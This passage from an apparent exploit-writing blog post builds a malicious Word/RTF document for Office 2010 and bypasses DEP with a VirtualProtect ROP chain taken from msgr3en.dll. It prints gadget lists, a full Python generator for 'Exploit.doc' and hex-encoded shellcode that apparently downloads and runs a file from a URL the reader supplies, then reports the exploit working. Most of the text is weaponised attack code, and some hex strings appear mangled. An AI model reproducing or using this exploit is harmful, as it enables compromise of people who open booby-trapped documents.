“x33x31x37x38x31x38x38x33x65x38x66x63x30x33x37x38” “x36x38x66x34x38x35x33x30x37x38x62x63x36x35x63x39” “x37x38x62x36x32x33x66x35x66x33x62x34x61x65x37x64” “x30x32x61x61x33x61x33x32x31x63x62x66x36x32x65x64” “x31x64x35x34x64x35x36x36x32x39x32x31x65x37x39x36” “x36x30x66x35x37x31x63x61x30x36x33x35x66x35x31x34” “x63x37x37x63x66x62x31x62x30x35x36x62x66x30x32x37” “x64x64x34x38x66x64x32x32x33x38x31x62x61x32x65x38” “x63x33x66x37x33x62x37x61x63x66x34x63x34x66x32x33” “x64x33x35x33x61x34x35x37x66x37x64x38x33x62x38x33” “x38x65x38x33x31x66x35x37x35x33x36x34x35x31x61x31” “x33x33x63x64x66x35x63x36x66x35x63x31x37x65x39x38” “x66x35x61x61x66x31x30x35x61x38x32x36x39x39x33x64” “x33x62x63x30x64x39x66x65x35x31x36x31x62x36x30x65” “x32x66x38x35x31x39x38x37x62x37x37x38x32x66x35x39” “x39x30x37x62x64x37x30x35x37x66x65x38x37x62x63x61” ) footer =(“x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x36x31x36x31x36x31x36x31x36x31x36x31x36x31” “x36x31x7Dx7Dx7Dx7D”) payload = header + jmpesp + header2 + magic + footer file = open(“exp.doc”,’wb’) file.write(payload) file.close() [/code] Now, let’s discuss how to bypass DEP. Since we can’t execute our own code on the stack, the only thing we can do is execute existing instructions or call existing functions from loaded modules and use data on the stack as a parameter forthose functions/instructions. There are various methods and functions used to bypass DEP such as: →VirtualAlloc →HeapCreate →SetProcessDepPolicy →VirtualProtect →WriteProcessMemory Of all the above, for simplicity’s sake, I will use the VirtualProtect function to bypass DEP. The objective of VirtualProtect is to set the permission of a stack area as executable so that our shellcode can get executed. Now I will show a practical and live example. I hope you can understand this better rather than multiple lengthy examples. VirtualProtect() The VirtualProtect function changes the access protection of memory in the calling process. BOOL WINAPI VirtualProtect( __in LPVOID lpAddress, __in SIZE_T dwSize, __in DWORD flNewProtect, __out PDWORD lpflOldProtect ); If you want to use this function, you will have to put 5 parameters on the stack. On XP SP3, VirtualProtect() is located at 0x7C801AD4 (kernel32.dll), but there are two things that you can do: one is to make an ROP chain manually, the other using a tool that does it automatically. Here’s how to do the former: we know that in order to bypass DEP manually, you have to set all parameters for the VirtualProtect function, In order to make an ROP chain, we have to find anROP gadget. (The instruction code used to make anROP chain is called an ROP gadget.) I have selected adll named msgr3en.dll to find it. In this example, I will use VirtualProtect () to modify the protection parameter of the memory page where the shellcode is located. This function requires the following parameters which are explained below:
- return address: This is the address where control returns after finishing VirtualProtect. Or, you may say that this is the address of your shellcode. It is a dynamically generated address.
- lpAddress: A pointer to the location wherethe shellcode is placed. This is also a dynamically generated address you need to set at run time.
- Size:As the name suggests,it’s the size that needs to be passed.
- flNewProtect: This is a protection flag.To make the stack area executable,this should be 0x20.
- lpfloldprotect:Old protection value. We will now pass all parameters in order to call VirtualProtect. Here are the instructions: #0x3F208016 : # RETN [Module : MSGR3EN.DLL] #0x3F208016 : # RETN [Module : MSGR3EN.DLL] #0x3F208016 : # RETN [Module : MSGR3EN.DLL] #0x3F208016 : # RETN [Module : MSGR3EN.DLL] #0x3F208016 : # RETN [Module : MSGR3EN.DLL] #0x3F394685 : {POP} # PUSH ESP # XOR EAX,EAX # POP EDI # POP ESI # RETN [Module : MSGR3EN.DLL] #0x3F39FC28 : # MOV EAX,EDI # POP ESI # RETN [Module : MSGR3EN.DLL] #0x3F3513A0 : # ADD ESP,20 # RETN 4 – MSGR3EN.DLL – #0x3F2EF6BF : # XCHG EAX,EDX # RETN [Module : MSGR3EN.DLL] #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] #0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] #0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] #0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] #0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] #0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] #0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] #0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] #0x3F34588C # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] #0x3f2fed4c # POP EAX # RETN ** [MSGR3EN.DLL] #0x3f2b745e # MOV ECX,DWORD PTR DS:[EAX] # RETN [MSGR3EN.DLL] #0x3F34588C # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] #ADD EAX,8 # RETN [Module : MSGR3EN.DLL] #ADD EAX,8 # RETN [Module : MSGR3EN.DLL] #ADD EAX,8 # RETN [Module : MSGR3EN.DLL] #0x3F2FDA08 # XCHG EAX,ESP # RETN [Module : MSGR3EN.DLL] So let me explain this in some detail.I found the above instruction in the dll named msgr3en.dll. This dll gets loaded at the runtime when Office gets loaded. The rule of thumb concerning ROP chain is you take the instruction from the module that is loaded with the application. Now,we set all parameters for the VirtualProtect function from the above instruction in order to make stack area executable: #———————–put Stack Pointer in EAX & EDI ————————–# rop = “8546393f” #0x3F394685 : {POP} #PUSH ESP #XOR EAX,EAX#POP EDI #POP ESI#RETN [Module : MSGR3EN.DLL] rop += “41414141” #Padding for POP ESI rop += “28fc393f” #0x3F39FC28 : #MOV EAX,EDI #POP ESI #RETN[Module : MSGR3EN.DLL] rop += “41414141” #Padding for POP ESI rop += “a013353f” #0x3F3513A0 : 20 :# ADD ESP,20 # RETN 4 – MSGR3EN.DLL rop += “41414141” * 2 #Padding for JUMP #——————-Parameters for VirtualProtect() —————————-# VirtualProtect = “825a203f” #0x3f205a82 : # JMP ECX | Call VirtualProtect() VirtualProtect += “41414141” #Return Address VirtualProtect += “42424242” #lpAdress VirtualProtect += “dc050000” #Size 1500 VirtualProtect += “40000000” #flNewProtect VirtualProtect += “10133b3f” #Writeable Address 3F3B1310 #——————– Setting 1st Parameter ————————————–# param1 = “bff62e3f” #0x3F2EF6BF : # XCHG EAX,EDX # RETN [Module : MSGR3EN.DLL] param1 += “41414141” #Padding for ADD ESP,20 # RETN 4 param1 += “8c58343f” #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] param1 += “ef94303f” #0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] param1 += “8c58343f” #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] param1 += “f782393f” #0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] param1 += “41414141” #Padding for POP EBP param1 += “e982393f” #0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] param1 += “41414141” #Padding for POP EBP param1 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param1 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param1 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param1 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param1 += “1197363f” #0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] param1 += “41414141” #Padding for POP EDI param1 += “41414141” #Padding for POP ESI #——————– Setting 2nd Parameter ————————————–# param2 = “8c58343f” #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] param2 += “41414141” #Padding for RETN 4 param2 += “ef94303f” #0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] param2 += “8c58343f” #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] param2 += “f782393f” #0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] param2 += “41414141” #Padding for POP EBP param2 += “e982393f” #0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] param2 += “41414141” #Padding for POP EBP param2 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param2 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param2 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param2 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param2 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param2 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param2 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param2 += “8aa02c3f” #0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] param2 += “1197363f” #0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] param2 += “41414141” #Padding for POP EDI param2 += “41414141” #Padding for POP ESI #————————- Fetch & Call VirtualProtect() address ———————-# call = “8c58343f” #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] call += “41414141” #Padding for RET 4 call += “4ced2f3f” #0x3f2fed4c : # POP EAX # RETN * [MSGR3EN.DLL] call += “0811103f” #PTR to VirtualProtect() call += “5e742b3f” #0x3f2b745e : # MOV ECX,DWORD PTR DS:[EAX] # RETN [MSGR3EN.DLL] call += “8c58343f” #0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] call += “30d7393f” #ADD EAX,8 # RETN [Module : MSGR3EN.DLL] call += “30d7393f” #ADD EAX,8 # RETN [Module : MSGR3EN.DLL] call += “30d7393f” #ADD EAX,8 # RETN [Module : MSGR3EN.DLL] call += “08da2f3f” #0x3F2FDA08 : # XCHG EAX,ESP # RETN [Module : MSGR3EN.DLL] Now this is the time to write the complete code for the exploit and that is: #!/usr/bin/python importstruct importbinascii header = (“x7Bx5Cx73x68x70x7Bx5Cx73x70x7Dx7D” “x7Bx5Cx73x68x70x7Bx5Cx73x70x7Dx7Dx7Bx5Cx73x68x70x7B” “x5Cx73x70x7Dx7Dx7Bx5Cx23x73x68x70x7Bx5Cx2Ax5Cx73x68” “x70x69x6Ex73x74x5Cx73x68x70x66x68x64x72x30x5Cx23x73” “x68x70x62x78x63x6Fx6Cx75x6Dx6Ex5Cx73x68x70x62x79x70” “x61x72x61x5Cx73x68x20x70x77x72x32x7Dx7Bx5Cx73x70x7B” “x7Bx5Cx73x6Ex20x7Bx7Dx7Bx7Dx7Bx5Cx73x6Ex7Dx7Bx5Cx73” “x6Ex7Dx7Bx7Bx5Cx2Ax5Cx2Ax7Dx7Dx70x46x72x61x67x6Dx65” “x6Ex74x73x7Dx7Bx5Cx2Ax5Cx2Ax5Cx2Ax7Dx7Bx23x5Cx73x76” “x7Bx5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2A” “x5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5C” “x2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2Ax5Cx2A” “x5Cx2Ax7Dx39x3Bx32x3Bx66x66x66x66x66x66x66x66x66x66” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23x23” “x23x23x23x23x23x23x23x23x30x35x30x30x30x30x41x30x30” “x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30” “x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30x30”) #Main Control Main = “1780203f” # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] ** req = (“x31x31x31x31x31x31x31x31x31x31x31x31” # 00000060 “x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31” # 00000070 “x31x31x31x31x30x30x30x30x30x30x30x30”) control = “1780203f” # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] ** control += “1780203f” # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] ** control += “1780203f” # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] ** control += “1780203f” # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] ** control += “1780203f” # 0x3F208016 : # RETN [Module : MSGR3EN.DLL] ** #———————–put Stack Pointer in EAX & EDI ————————–# rop = “8546393f” # 0x3F394685 : {POP} # PUSH ESP # XOR EAX,EAX # POP EDI # POP ESI # RETN [Module : MSGR3EN.DLL] ** rop += “41414141” # Padding for POP ESI rop += “28fc393f” # 0x3F39FC28 : # MOV EAX,EDI # POP ESI # RETN [Module : MSGR3EN.DLL] ** rop += “41414141” # Padding for POP ESI rop += “a013353f” # 0x3F3513A0 : 20 : # ADD ESP,20 # RETN 4 – MSGR3EN.DLL – ** rop += “41414141” * 2 # Padding for JUMP #——————-Parameters for VirtualProtect() —————————-# VirtualProtect = “825a203f” # 0x3f205a82 : # JMP ECX | Call VirtualProtect() VirtualProtect += “41414141” # Return Address VirtualProtect += “42424242” # lpAdress VirtualProtect += “dc050000” # Size 1500 VirtualProtect += “40000000” # flNewProtect VirtualProtect += “10133b3f” # Writeable Address 3F3B1310 #——————– Setting 1st Parameter ————————————–# param1 = “bff62e3f” # 0x3F2EF6BF : # XCHG EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param1 += “41414141” # Padding for ADD ESP,20 # RETN 4 param1 += “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param1 += “ef94303f” # 0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] ** param1 += “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param1 += “f782393f” # 0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] ** param1 += “41414141” # Padding for POP EBP param1 += “e982393f” # 0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] ** param1 += “41414141” # Padding for POP EBP param1 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param1 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param1 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param1 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param1 += “1197363f” # 0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] ** param1 += “41414141” # Padding for POP EDI param1 += “41414141” # Padding for POP ESI #——————– Setting 2nd Parameter ————————————–# param2 = “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param2 += “41414141” # Padding for RETN 4 param2 += “ef94303f” # 0x3F3094EF : # XCHG EAX,ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** param2 += “f782393f” # 0x3F3982F7 : # ADD EAX,100 # POP EBP # RETN [Module : MSGR3EN.DLL] ** param2 += “41414141” # Padding for POP EBP param2 += “e982393f” # 0x3F3982E9 : # ADD EAX,40 # POP EBP # RETN [Module : MSGR3EN.DLL] ** param2 += “41414141” # Padding for POP EBP param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “8aa02c3f” # 0x3F2CA08A : # INC ESI # RETN [Module : MSGR3EN.DLL] ** param2 += “1197363f” # 0x3F369711 : {POP} # MOV DWORD PTR DS:[ESI+18],EAX # POP EDI # POP ESI # RETN 4 [Module : MSGR3EN.DLL] ** param2 += “41414141” # Padding for POP EDI param2 += “41414141” # Padding for POP ESI #————————- Fetch & Call VirtualProtect() address ———————-# call = “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** call += “41414141” # Padding for RET 4 call += “4ced2f3f” # 0x3f2fed4c : # POP EAX # RETN ** [MSGR3EN.DLL] call += “0811103f” # PTR to VirtualProtect() call += “5e742b3f” # 0x3f2b745e : # MOV ECX,DWORD PTR DS:[EAX] # RETN ** [MSGR3EN.DLL] call += “8c58343f” # 0x3F34588C : # MOV EAX,EDX # RETN [Module : MSGR3EN.DLL] ** call += “30d7393f” # ADD EAX,8 # RETN [Module : MSGR3EN.DLL] ** call += “30d7393f” # ADD EAX,8 # RETN [Module : MSGR3EN.DLL] ** call += “30d7393f” # ADD EAX,8 # RETN [Module : MSGR3EN.DLL] ** call += “08da2f3f” # 0x3F2FDA08 : # XCHG EAX,ESP # RETN [Module : MSGR3EN.DLL] ** nops = “90” * 180 magic = ( “x65x62x37x31x33x31x63x39x36x34x38x62x37x31x33x30x38” “x62x37x36x30x63x38x62x37x36x31x63x38x62x35x65x30x38” “x38x62x37x65x32x30x38x62x33x36x36x36x33x39x34x66x31” “x38x37x35x66x32x63x33x36x30x38x62x36x63x32x34x32x34” “x38x62x34x35x33x63x38x62x35x34x32x38x37x38x30x31x65” “x61x38x62x34x61x31x38x38x62x35x61x32x30x30x31x65x62” “x65x33x33x34x34x39x38x62x33x34x38x62x30x31x65x65x33” “x31x66x66x33x31x63x30x66x63x61x63x38x34x63x30x37x34” “x30x37x63x31x63x66x30x64x30x31x63x37x65x62x66x34x33” “x62x37x63x32x34x32x38x37x35x65x31x38x62x35x61x32x34” “x30x31x65x62x36x36x38x62x30x63x34x62x38x62x35x61x31” “x63x30x31x65x62x38x62x30x34x38x62x30x31x65x38x38x39” “x34x34x32x34x31x63x36x31x63x33x65x38x39x32x66x66x66” “x66x66x66x35x64x65x62x30x35x65x38x66x33x66x66x66x66” “x66x66x38x39x65x66x38x33x65x66x38x39x38x39x65x65x38” “x33x65x65x39x35x38x31x65x64x34x35x66x66x66x66x66x66” “x36x38x33x33x63x61x38x61x35x62x35x33x65x38x38x61x66” “x66x66x66x66x66x35x35x36x61x36x34x66x66x64x30x35x37” “x38x39x63x37x30x31x65x66x61x34x38x30x37x66x66x66x30” “x30x37x35x66x39x35x66x36x38x38x65x34x65x30x65x65x63” “x35x33x65x38x36x64x66x66x66x66x66x66x33x31x63x39x36” “x36x62x39x36x66x36x65x35x31x36x38x37x35x37x32x36x63” “x36x64x35x34x66x66x64x30x36x38x33x36x31x61x32x66x37” “x30x35x30x65x38x35x33x66x66x66x66x66x66x33x31x63x39” “x35x31x35x31x35x35x35x37x35x31x66x66x64x30x36x38x39” “x38x66x65x38x61x30x65x35x33x65x38x33x66x66x66x66x66” “x66x66x34x31x35x31x35x35x66x66x64x30x37x33x37x36x36” “x33x36x38x36x66x37x33x37x34x32x65x36x35x37x38x36x35” “x30x30” ) URL = “write your own url” binnu = binascii.b2a_hex(URL) shellcode = magic + binnu + URL2 end = (“x7Bx7Dx7Dx7Dx7Dx7Dx7Dx2Ex2Ex2Ex7Dx7D”) fo = open(“template”, “rb”) tmpl = fo.read(); fo.close() #################################### payload = tmpl + header + Main + req + control + rop + VirtualProtect + param1 + param2 + call + nops + shellcode + end ############################################# file = open(“Exploit.doc”,’wb’) file.write(payload) file.close Now we need to check if the exploit works.Let’s check the status of DEP.
DEP is enabled.Let’s see if the exploit works.
Wow, the exploit is working fine. Just a reminder: my objective for this post was not to discuss how to create an ROP chain in detail but to show how to make an exploit work on Office 2010. One should be easily able to understand what I have written above. In the next article, I will write only about the process of making an ROP chain in detail, step by step.